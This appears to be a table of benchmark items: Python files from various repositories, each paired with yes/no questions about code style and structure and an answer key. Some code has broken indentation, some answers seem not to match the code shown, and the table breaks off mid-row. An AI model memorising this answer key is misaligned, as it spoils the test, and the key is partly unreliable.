source string | points list | n_points int64 | path string | repo string |
|---|---|---|---|---|
__author__ = 'tester'
import re
def test_phones_on_home_page(app):
    """Home-page phone column must equal the merged phones from the edit page."""
    home_contact = app.contact.get_contact_list()[0]
    edit_contact = app.contact.get_contact_info_from_edit_page(0)
    expected = merge_phones_like_on_home_page(edit_contact)
    assert home_contact.all_phones_from_home_page == expected
def test_phones_on_contact_view_page(app):
    """Each phone field shown on the view page must match the edit page."""
    view_contact = app.contact.get_contact_from_view_page(0)
    edit_contact = app.contact.get_contact_info_from_edit_page(0)
    for field in ("homephone", "mobilephone", "workphone", "secondaryphone"):
        assert getattr(view_contact, field) == getattr(edit_contact, field)
def clear(s):
    """Strip phone-number punctuation (parentheses, spaces, dashes) from *s*."""
    return s.translate(str.maketrans("", "", "() -"))
def merge_phones_like_on_home_page(contact):
    """Join the contact's cleaned, non-empty phone numbers with newlines,
    mirroring how the home page renders the phones column."""
    raw_phones = [contact.homephone, contact.mobilephone,
                  contact.workphone, contact.secondaryphone]
    cleaned = [clear(phone) for phone in raw_phones if phone is not None]
    return "\n".join(phone for phone in cleaned if phone != "")
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excludi... | 3 | test/test_phones.py | EwgOskol/python_training |
"""0.10.0 create new schedule tables
Revision ID: 493871843165
Revises: 942138e33bf9
Create Date: 2021-01-13 14:43:03.678784
"""
from dagster.core.storage.migration.utils import create_0_10_0_schedule_tables
# revision identifiers, used by Alembic.
revision = "493871843165"
down_revision = "942138e33bf9"
branch_labels = None
depends_on = None
def upgrade():
    # Delegate to the shared dagster migration helper that creates the
    # 0.10.0 schedule tables.
    create_0_10_0_schedule_tables()
def downgrade():
    # No-op: this migration defines no reverse step.
    pass
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answe... | 3 | python_modules/dagster/dagster/core/storage/alembic/versions/014_0_10_0_create_new_schedule_tables_postgres.py | asamoal/dagster |
#!/usr/bin/python3
from argparse import ArgumentParser
import subprocess
def main():
    """Parse the required --version flag and build the deb package."""
    parser = ArgumentParser()
    parser.add_argument('--version', required=True)
    parsed = parser.parse_args()
    _create_package(parsed.version)
def _create_package(version):
    """Assemble the fpm command line for the armada-microservice deb and run it."""
    # Runtime dependencies baked into the deb's Depends field.
    depends = [
        "supervisor", "python3", "python3-dev", "python3-pip", "git", "curl",
        "mc", "less", "software-properties-common", "wget", "vim", "gcc",
        "unzip", "apt-utils", "net-tools", "cron", "netcat", "sudo", "file",
        "iproute2", "bash-completion",
    ]
    suggests = ["haproxy"]
    fpm_options = [
        "fpm",
        "-t", "deb",
        "-s", "dir",
        "--description", "armada",
        "-C", './microservice',
        "--license", "\"Apache 2.0\"",
        "--maintainer", "cerebro@ganymede.eu",
        "--url", "armada.sh",
        "--after-install", 'after-install.sh',
        "--after-remove", 'after-remove.sh',
        "--template-scripts",
        "--name", 'armada-microservice',
        "--version", version,
        "--architecture", 'x86_64',
    ]
    for package in depends:
        fpm_options.extend(['--depends', package])
    for package in suggests:
        fpm_options.extend(['--deb-suggests', package])
    # Raises CalledProcessError if fpm fails, so 'OK' only prints on success.
    subprocess.check_call(fpm_options)
    print('OK')
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": true
... | 3 | docker-containers/microservice_focal/packaging/package_build.py | b-bird/armada |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import logging
from doubanfm.views import help_view
from doubanfm.controller.lrc_controller import LrcController
logger = logging.getLogger('doubanfm') # get logger
class HelpController(LrcController):
    """
    Key-press controller for the help screen.
    (Translated from the original Chinese docstring: "key control".)
    """
    def __init__(self, player, data, queue):
        # Accept player, data and queue; the base LrcController wires them up.
        super(HelpController, self).__init__(player, data, queue)
        self.view = help_view.Help(self.data)

    def _bind_view(self):
        # Rebuild the help view from the current data (same as in __init__).
        self.view = help_view.Help(self.data)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | doubanfm/controller/help_controller.py | fakegit/douban.fm |
from typing import List
import numpy as np
from .mesh import StudioMesh
from .....library.utils.byte_io_mdl import ByteIO
class StudioModel:
    """A studio model: header fields, packed vertices/normals and child meshes."""
    # Packed per-vertex record: uint32 bone id + 3x float32 position = 16 bytes.
    vertex_dtype = np.dtype([
        ('id', np.uint32, (1,)),
        ('pos', np.float32, (3,)),
    ])

    def __init__(self):
        self.name = ''
        self.unk_1 = 0  # unknown header field
        self.unk_2 = 0  # unknown header field
        self.bounding_radius = 0.0
        self.vertex_count = 0
        self.normal_count = 0
        self.mesh_count = 0
        self._vertices = np.array([])  # structured array of vertex_dtype
        self._normals = np.array([])   # structured array of vertex_dtype
        self.meshes: List[StudioMesh] = []

    @property
    def bone_vertex_info(self):
        # Flat array of per-vertex bone ids.
        return self._vertices['id'].flatten()

    @property
    def bone_normal_info(self):
        # Flat array of per-normal bone ids.
        return self._normals['id'].flatten()

    @property
    def vertices(self):
        # (vertex_count, 3) float32 positions.
        return self._vertices['pos']

    @property
    def normals(self):
        # (normal_count, 3) float32 normal vectors.
        return self._normals['pos']

    def read(self, reader: ByteIO):
        """Parse the model header, then the vertex/normal blocks and meshes."""
        self.name = reader.read_ascii_string(32)
        (self.unk_1, self.unk_2,
         self.bounding_radius,
         self.vertex_count,
         self.normal_count,
         self.mesh_count,
         ) = reader.read_fmt('2if3i')
        # 16 bytes per record, matching vertex_dtype.itemsize.
        self._vertices = np.frombuffer(reader.read(16 * self.vertex_count), self.vertex_dtype)
        self._normals = np.frombuffer(reader.read(16 * self.normal_count), self.vertex_dtype)
        for _ in range(self.mesh_count):
            mesh = StudioMesh()
            mesh.read(reader)
            self.meshes.append(mesh)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | library/goldsrc/mdl_v4/structs/model.py | anderlli0053/SourceIO |
import pytest
from thedarn.rules.java import match, get_new_command
from thedarn.types import Command
@pytest.mark.parametrize('command', [
    Command('java foo.java', ''),
    Command('java bar.java', '')])
def test_match(command):
    # The rule must trigger for `java Something.java` invocations.
    assert match(command)
@pytest.mark.parametrize('command, new_command', [
    (Command('java foo.java', ''), 'java foo'),
    (Command('java bar.java', ''), 'java bar')])
def test_get_new_command(command, new_command):
    # The fixer should drop the ".java" suffix from the argument.
    assert get_new_command(command) == new_command
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (... | 3 | tests/rules/test_java.py | frankhli843/thedarn |
import numpy as np
from numpy.testing import assert_allclose, assert_equal
import unittest
from pb_bss.distribution import VonMisesFisher
from pb_bss.distribution import VonMisesFisherTrainer
class TestGaussian(unittest.TestCase):
    # NOTE(review): despite the class name, these tests exercise the
    # VonMisesFisher trainer/distribution.
    def test_shapes(self):
        # Fitting plain 3-d samples yields a 3-d mean and a scalar concentration.
        samples = 10000
        mean = np.ones((3,))
        covariance = np.eye(3)
        x = np.random.multivariate_normal(mean, covariance, size=(samples,))
        model = VonMisesFisherTrainer().fit(x)
        assert_equal(model.mean.shape, mean.shape)
        assert_equal(model.concentration.shape, ())

    def test_shapes_independent_dims(self):
        # A leading independent dimension (13) is preserved in the fitted params.
        samples = 10000
        mean = np.ones((3,))
        covariance = np.eye(3)
        x = np.random.multivariate_normal(mean, covariance, size=(13, samples,))
        model = VonMisesFisherTrainer().fit(x)
        assert_equal(model.mean.shape, np.tile(mean, (13, 1)).shape)
        assert_equal(model.concentration.shape, (13,))

    def test_von_mises_fisher(self):
        # Disabled by the early `return` below: sampling is not implemented yet.
        # The unreachable assertions document the intended check.
        samples = 10000
        mean = np.ones((3,))
        mean /= np.linalg.norm(mean, axis=-1)
        concentration = 50
        # ToDo: Implement VonMisesFisher(...).sample(...)
        return
        x = VonMisesFisher(mean, concentration).sample(size=(samples,))
        model = VonMisesFisherTrainer().fit(x)
        assert_allclose(model.mean, mean, atol=0.1)
        assert_allclose(model.covariance, concentration, atol=0.1)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | tests/test_distribution/test_von_mises_fisher.py | mdeegen/pb_bss |
from tkinter import *
import tkinter.font
from gpiozero import LED
import RPi.GPIO
RPi.GPIO.setmode(RPi.GPIO.BCM)
### HARDWARE DEFINITIONS ###
# LED pin definitions
led0 = LED(7)
led1 = LED(8)
led2 = LED(25)
led3 = LED(23)
led4 = LED(24)
led5 = LED(18)
led6 = LED(15)
led7 = LED(14)
# Arrange LEDs into a list
leds = [led7,led6,led5,led4,led3,led2,led1,led0]
### GUI DEFINITIONS ###
win=Tk()
win.title("LED Controller")
myFont=tkinter.font.Font(family = 'Helvetica', size = 12, weight = "bold")
ledCode = StringVar()
### Event Functions ###
def ledShow():
    """Read the binary code from the entry box and light the matching LEDs."""
    ledCode = code.get()
    print("LED code: ", ledCode) #Debug
    # A '1' at position i turns leds[i] on; any other character turns it off.
    # (Codes longer than the LED list still raise IndexError, as before.)
    for position, bit in enumerate(ledCode):
        if bit == "1":
            leds[position].on()
        else:
            leds[position].off()
def close(): # Cleanly close the GUI and cleanup the GPIO
    RPi.GPIO.cleanup()  # release GPIO pins before tearing down the window
    win.destroy()
### WIDGETS ###
ledButton = Button(win, text='Load LED code', font=myFont, command=ledShow, bg='bisque2', height=1)
ledButton.grid(row=0,column=1)
code = Entry(win, font=myFont, width=10)
code.grid(row=0,column=0)
exitButton = Button(win, text='Exit', font=myFont, command=close, bg='red', height=1, width=6)
exitButton.grid(row=3,column=1, sticky=E)
win.protocol("WM_DELETE_WINDOW", close) # cleanup GPIO when user closes window
win.mainloop() # Loops forever | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | led-command-centre.py | kazma89/Taller_RPi |
import pytest
from skidl import *
from .setup_teardown import *
def test_pin_names_1():
    # Pin access by name (codec["ain"]) and by number slice must match the
    # explicit .n (name) and .p (number) accessors.
    codec = Part("xess.lib", "ak4520a")
    assert codec["ain"] == codec.n["ain"]
    assert codec[1:4] == codec.p[1:4]
def test_pin_names_2():
    """Renaming/renumbering pins keeps name- and number-based lookup coherent."""
    codec = Part("xess.lib", "ak4520a")
    # Give pin 4 the name A1; give pin 8 the name A2 and the *number* A1.
    codec[4].name = "A1"
    codec[8].name = "A2"
    codec[8].num = "A1"
    # Pin 4 is reachable by number 4 and by name A1.
    assert codec[4] is codec.n["A1"]
    assert codec.p[4] is codec.n["A1"]
    assert codec[4] is codec.p[4]
    # Pin 8 is reachable by number "A1" and by name A2.
    assert codec.p["A1"] is codec.n["A2"]
    assert codec["A1"] is codec.n["A2"]
    assert codec["A1"] is codec.p["A1"]
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | tests/test_pin_num_name.py | arjenroodselaar/skidl |
import json
from urllib.parse import urlparse
from django.db.models import Q
from django.utils.encoding import smart_text
def get_url_path(url):
    """Return only the path component of *url* (scheme, host, query dropped)."""
    return urlparse(url).path
def get_redirect_location(response):
    """Return the path of a redirect response's Location header.

    Django 1.8 may put an absolute URL in Location, so normalise it through
    get_url_path().
    """
    location = response['Location']
    return get_url_path(location)
def filter_products_by_attribute(queryset, attribute_id, value):
    """Keep products whose product- or variant-level attributes contain the pair."""
    attr_key = smart_text(attribute_id)
    attr_value = smart_text(value)
    matches = (Q(attributes__contains={attr_key: attr_value})
               | Q(variants__attributes__contains={attr_key: attr_value}))
    return queryset.filter(matches)
def get_graphql_content(response):
    """Decode a GraphQL HTTP response body into Python data."""
    body = response.content.decode('utf8')
    return json.loads(body)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | tests/utils.py | skazancev/saleor |
from allennlp_demo.common.testing import ModelEndpointTestCase
from allennlp_demo.ccg_supertagging.api import CCGSupertaggingModelEndpoint
class TestCCGSupertaggingModelEndpoint(ModelEndpointTestCase):
    """Endpoint tests for the CCG supertagging demo model.

    NOTE(review): test_attack needs the prediction produced by test_predict;
    when it runs on a fresh instance it triggers the prediction itself.
    """
    endpoint = CCGSupertaggingModelEndpoint()
    predict_input = {
        "sentence": "Did Uriah honestly think he could beat The Legend of Zelda in under three hours?"
    }
    # Filled in by test_predict; consumed by test_attack.
    attack_input = None
    predict_okay = None

    def test_predict(self):
        """
        Test the /predict route.
        """
        if self.predict_okay:
            return
        response = self.client.post("/predict", json=self.predict_input)
        self.check_response_okay(response, cache_hit=False)
        response_data = response.get_json()
        # Build the attack payload from the first predicted instance only.
        self.attack_input = {
            '0': {'tags': response_data['0']['tags'], 'words': response_data['0']['words']}
        }
        self.predict_okay = True

    def test_attack(self):
        """Test the /attack/input_reduction route (runs predict first if needed)."""
        if self.attack_input is None:
            self.test_predict()
        inputs = dict(
            inputs=self.attack_input,
            input_field_to_attack="tokens",
            grad_input_field="grad_input_1",
            ignore_tokens=None,
            target=None)
        response = self.client.post("/attack/input_reduction", json=inputs)
        self.check_response_okay(response, cache_hit=False)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true... | 3 | api/allennlp_demo/ccg_supertagging/test_api.py | jakpra/allennlp-demo |
import os
import json
import random as rn
class Process_pr:
    """Wrapper around the `gh` CLI for assigning interns to a pull request."""

    def __init__(self, pr_number, pr_author):
        # Private state, exposed read-only through pr_number()/author().
        self.__pr_number = pr_number
        self.__pr_author = pr_author

    def author(self):
        """Return the PR author's login."""
        return self.__pr_author

    def pr_number(self):
        """Return the PR number."""
        return self.__pr_number

    def command(self, cmd, save_output=True):
        """Run a shell command; parse its stdout as JSON when save_output is set."""
        try:
            if save_output:
                return json.loads(os.popen(cmd).read())
            os.system(cmd)
        except json.decoder.JSONDecodeError:
            # Unparseable output means the PR lookup failed.
            print("PR doesn't exist. Exiting process!")
            exit()

    def assign_intern(self, ivy_intern):
        """Assign the given intern to this PR."""
        # --add-reviewer "{ivy_intern}"
        # Need to find a way how to overcome the permissions for GH Actions
        self.command(
            f'gh pr edit {self.pr_number()} --add-assignee "{ivy_intern}"',
            save_output=False,
        )

    def assign_random_intern(self, intern_list):
        """Pick a random intern from intern_list and assign them to this PR."""
        chosen = rn.choice(intern_list)
        # --add-reviewer "{chosen}"
        # Need to find a way how to overcome the permissions for GH Actions
        self.command(
            f'gh pr edit {self.pr_number()} --add-assignee "{chosen}"',
            save_output=False,
        )
        print(f"[+] {chosen} was assigned to PR {self.pr_number()}")
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | automation_tools/pr_automation/process_pr.py | VedPatwardhan/ivy |
# Copyright (c) 2021 Johnathan P. Irvin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from abc import ABC, abstractmethod
from starlette.types import Message
class AbstractSocket(ABC):
    """Abstract interface over a message-oriented socket."""

    @abstractmethod
    async def send(self, message: Message) -> None:
        """
        Send a message to the socket.

        Args:
            message (Message): The message to send.
        """

    @abstractmethod
    async def receive(self) -> Message:
        """
        Receive data from the socket.

        Returns:
            Message: The message received.
        """

    @abstractmethod
    async def accept(self) -> None:
        # Fix: the old docstring documented a `subprotocol` argument that
        # this method does not take.
        """Accept a connection."""

    @abstractmethod
    async def close(self) -> None:
        """Close the socket."""
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | viking/connections/interfaces/abstract_socket.py | JohnnyIrvin/CommunicateProject |
"""Compatibility constants and helpers for Python 2.x and 3.x.
"""
import sys
# NB If this module grows to more than a handful of items it is probably
# to bite the bullet and depend on the six package.
__all__ = [
'string_types',
'binary_type',
'text_type',
'int2byte',
'byte2int'
]
# Needed for isinstance() checks
# Same behaviour as six.string_types https://pythonhosted.org/six/#constants
if sys.version_info < (3, 0):
# Python 2.x
_PY2 = True
string_types = (basestring,) # noqa: F821
binary_type = str
text_type = unicode # noqa: F821
else:
# Python 3.x
_PY2 = False
string_types = (str,)
binary_type = bytes
text_type = str
def int2byte(i):
    """Return a length-1 byte string for integer *i* on both Python 2 and 3."""
    return chr(i) if _PY2 else bytes((i,))
def byte2int(i):
    """Return the integer value of a single byte.

    On Python 3 indexing a bytes object already yields an int, so *i* is
    returned unchanged; on Python 2 it is a 1-char str needing ord().
    """
    return ord(i) if _PY2 else i
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answe... | 3 | sdk/python-yubicommon/yubicommon/compat.py | lucusfly/iost-ledger-app |
from .modal_type_enum import *
class Modal:
    """View-model for a UI modal dialog (default headline: 'Hinweis')."""

    def __init__(
        self, message: str = "", type: MODAL_TYPE = MODAL_TYPE.SUCCESS, headline: str = "Hinweis"
    ):
        # NOTE: `type` shadows the builtin, but renaming the parameter would
        # break callers passing it by keyword.
        self.modal_type = type
        self.modal_msg = message
        self.modal_headline = headline

    def to_dict(self):
        """Serialise the modal into a JSON-ready dict."""
        return {
            "modal_type": self.modal_type.value,
            "modal_msg": self.modal_msg,
            "modal_headline": self.modal_headline,
        }
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than class... | 3 | sws_webstuff/modal_class.py | Aurvandill137/sws_webstuff |
"""Importer decorators."""
import logging
from functools import wraps
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ImporterHook:
    """Interface for an importer hook."""

    def __call__(self, importer, file, imported_entries, existing_entries):
        """Apply the hook and modify the imported entries.

        Args:
            importer: The importer that this hook is being applied to.
            file: The file that is being imported.
            imported_entries: The current list of imported entries.
            existing_entries: The existing entries, as passed to the extract
                function.

        Returns:
            The updated imported entries.
        """
        raise NotImplementedError
def apply_hooks(importer, hooks):
    """Wrap importer.extract so each hook post-processes the extracted entries.

    Args:
        importer: An importer instance.
        hooks: A list of hooks, each a callable object.

    Returns:
        The same importer, with its extract method patched in place.
    """
    original_extract = importer.extract

    @wraps(original_extract)
    def extract_with_hooks(file, existing_entries=None):
        logger.debug("Calling the importer's extract method.")
        entries = original_extract(file, existing_entries=existing_entries)
        # Each hook receives the running result and may replace it entirely.
        for hook in hooks:
            entries = hook(importer, file, entries, existing_entries)
        return entries

    importer.extract = extract_with_hooks
    return importer
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | smart_importer/hooks.py | EINDEX/smart_importer |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import os
import unittest
from functional_tests.data.atlas.skulls.run import AtlasSkulls
from functional_tests.data.atlas.brain_structures.run import AtlasBrainStructures
from functional_tests.data.atlas.digits.run import AtlasDigits
from functional_tests.data.regression.skulls.run import RegressionSkulls
TEST_MODULES = [AtlasSkulls, AtlasBrainStructures, AtlasDigits, RegressionSkulls]
def setup_conda_env():
    # environment.yml lives two directories above this file.
    path_to_environment_file = os.path.normpath(
        os.path.join(os.path.abspath(__file__), '../../../environment.yml'))
    # Source the user's profile first so `conda` is on PATH, then create the env.
    cmd = 'hostname && ' \
          'if [ -f ~/.profile ]; then . ~/.profile; fi &&' \
          'conda env create -f %s' % path_to_environment_file
    os.system(cmd)
def main():
    """Enable debug logging, provision the conda env, then run each test suite."""
    import logging
    logger = logging.getLogger(__name__)
    logger.addHandler(logging.StreamHandler())
    logger.setLevel(logging.DEBUG)
    setup_conda_env()
    for test_case in TEST_MODULES:
        suite = unittest.TestLoader().loadTestsFromTestCase(test_case)
        unittest.TextTestRunner(verbosity=2).run(suite)
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | tests/functional_tests/run_functional_tests.py | EuroPOND/deformetrica |
"""
Created on June 21, 2018
@author: Moritz
"""
import numpy as np
from spn.algorithms.Inference import add_node_likelihood
from spn.experiments.AQP.leaves.static.StaticNumeric import StaticNumeric
def static_likelihood_range(node, ranges, dtype=np.float64, **kwargs):
    """Likelihood of a StaticNumeric leaf evaluated over per-instance range queries.

    Args:
        node: Leaf with a single scope variable and a fixed value (node.val).
        ranges: 2-d array of range objects; columns are indexed by scope.
        dtype: dtype of the returned probability column.

    Returns:
        (num_instances, 1) array of probabilities.
    """
    assert len(node.scope) == 1, node.scope

    probs = np.ones((ranges.shape[0], 1), dtype=dtype)
    ranges = ranges[:, node.scope[0]]

    for i, rang in enumerate(ranges):
        # No range specified: keep probability 1 (log-probability of 0).
        if rang is None:
            continue

        # Impossible range: probability 0. Fix: the original set probs[i] = 0
        # but fell through and immediately overwrote it with the interval sum;
        # `continue` honours the "skip" intent and avoids needless work.
        if rang.is_impossible():
            probs[i] = 0
            continue

        # Sum the probability mass over every admissible interval.
        probs[i] = sum(_compute_probability_for_range(node, interval) for interval in rang.get_ranges())

    return probs
def _compute_probability_for_range(node, interval):
    """Probability mass of the constant-valued node inside one interval.

    A one-element interval denotes an exact value; two elements denote the
    closed range [lower, higher]. Returns 1 if node.val is inside, else 0.
    """
    if len(interval) == 1:
        return 1 if node.val == interval[0] else 0
    lower, higher = interval[0], interval[1]
    return 1 if lower <= node.val <= higher else 0
def add_static_inference_range_support():
    # Register the range-likelihood handler for StaticNumeric leaves.
    add_node_likelihood(StaticNumeric, static_likelihood_range)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | src/spn/experiments/AQP/leaves/static/InferenceRange.py | tkrons/SPFlow_topdownrules |
import os
from instaloader import Profile, Post
class IgpdLinuxFeaturesPrivate:
    """Download helpers driven through an authenticated Instaloader instance."""

    def download_post(self, link, p_instance_param):
        """Download the post at *link*; files are saved under its shortcode."""
        pid = link.rsplit("/", 2)[-2]  # shortcode is the second-to-last URL segment
        post = Post.from_shortcode(p_instance_param.context, pid)
        p_instance_param.download_post(post, target=(pid))
        print("\nPost downloaded successful and saved in -- " + pid)

    def download_story(self, s_username, s_instance_param):
        """Download the user's current stories into <username>/stories."""
        profile = Profile.from_username(s_instance_param.context, username=s_username)
        s_instance_param.download_stories(userids=[profile.userid], filename_target='{}/stories'.format(profile.username))
        print("Story downloaded successfully and saved as {}/stories".format(profile.username))

    def download_highlights(self, h_username, h_instance_param):
        """Download every highlight reel, one folder per highlight title."""
        profile = Profile.from_username(h_instance_param.context, username=h_username)
        for highlight in h_instance_param.get_highlights(user=profile):
            # highlight is a Highlight object
            for item in highlight.get_items():
                # item is a StoryItem object
                h_instance_param.download_storyitem(item, '{}/{}'.format(highlight.owner_username, highlight.title))
            print("\nHighlights downloaded successful and saved as {}/{}".format(highlight.owner_username, highlight.title))

    def download_profile(self, pf_username, pf_instance_param):
        """Download the whole profile of *pf_username*."""
        pf_instance_param.download_profile(profile_name=pf_username)
        print("\nProfile download successful and saved as -- " + pf_username)
class IgpdLinuxFeaturesPublic:
    """Download helpers that shell out to the instaloader CLI."""

    def download_pri(self, link):
        # Download a single post by shortcode via the CLI.
        # NOTE(review): *link* is interpolated into a shell command unescaped —
        # a crafted URL could inject shell syntax; confirm inputs are trusted.
        pid = link.rsplit("/", 2)[-2]
        os.system(f"instaloader -- -{pid}")

    def download_profile(self, username):
        # Download a whole profile via the CLI (same injection caveat as above).
        os.system(f"instaloader {username}")
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | src/features.py | ahn1305/igpd-linux |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Tests for `verdi status`."""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from click.testing import CliRunner
from aiida.backends.testbase import AiidaTestCase
from aiida.cmdline.commands import cmd_status
from aiida.backends.tests.utils.configuration import with_temporary_config_instance
class TestVerdiStatus(AiidaTestCase):
    """Tests for `verdi status`."""

    def setUp(self):
        # A fresh CliRunner for each test.
        self.cli_runner = CliRunner()

    @with_temporary_config_instance
    def test_status_1(self):
        """Test running verdi status.

        Note: The exit status may differ depending on the environment in which the tests are run.
        Also cannot check for the exit status to see if connecting to all services worked, because
        the profile might not be properly setup in this temporary config instance unittest.
        """
        options = []
        result = self.cli_runner.invoke(cmd_status.verdi_status, options)
        # The command exits via SystemExit; only verify the report sections appear.
        self.assertIsInstance(result.exception, SystemExit)
        self.assertIn('profile', result.output)
        self.assertIn('postgres', result.output)
        self.assertIn('rabbitmq', result.output)
        self.assertIn('daemon', result.output)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | aiida/backends/tests/cmdline/commands/test_status.py | lekah/aiida_core |
from math import sqrt, floor
def solution(n):
    """Sum recurse() over every possible largest step; 0 outside 3 <= n <= 200."""
    if n < 3 or n > 200:
        return 0
    # Memo table: cache[remaining][prev], -1 meaning "not computed yet".
    cache = [[-1] * n for _ in range(n)]
    total = 0
    # The largest step i must satisfy i*(i+1)/2 >= n, hence the sqrt lower bound.
    for first_step in range(int(floor(sqrt(n * 2))), n):
        total += recurse(n - first_step, first_step, cache)
    return total
def recurse(remaining, prev, cache):
    """Count ways to split `remaining` into strictly decreasing steps, all < `prev`.

    Fix: the original `if remaining < prev: return 0` short-circuited before the
    single-final-step branch (`prev > remaining: sum += 1`) could ever run,
    making that branch — and the `elif remaining == 0: return 1` after an
    earlier `return 0` for the same condition — unreachable, so the whole count
    collapsed to 0 (e.g. solution(5) returned 0 instead of 2 for 4+1 and 3+2).
    Removing the bad early return restores the intended recursion.

    Args:
        remaining: Bricks left to place.
        prev: Size of the previous (larger) step.
        cache: 2-d memo table initialised to -1.
    """
    if remaining == 0:
        return 0
    if prev == 1:
        return 0
    if cache[remaining][prev] != -1:
        return cache[remaining][prev]

    total = 0
    # Use all remaining bricks as the single final step (valid when < prev).
    if prev > remaining:
        total += 1
    # Otherwise choose the next (largest) step i; it needs i*(i+1)/2 >= remaining,
    # hence the sqrt lower bound, and must stay below prev.
    for i in range(int(floor(sqrt(remaining * 2))), remaining):
        if i >= prev:
            break
        total += recurse(remaining - i, i, cache)

    cache[remaining][prev] = total
    return total
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
